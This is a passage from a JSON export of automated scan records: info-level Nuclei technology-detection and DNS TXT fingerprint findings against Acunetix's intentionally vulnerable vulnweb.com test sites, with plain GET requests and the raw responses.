value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(28) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(28) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(29) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 136, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "google-font-api", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:34:46.390Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 137, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.456Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 58030\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 58030\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3593\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 138, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.569Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 12475\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 12475\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3594\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 139, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.666Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 12862\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 12862\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3594\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 140, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angularjs", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:34:46.781Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 141, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angularjs", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:34:46.878Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link 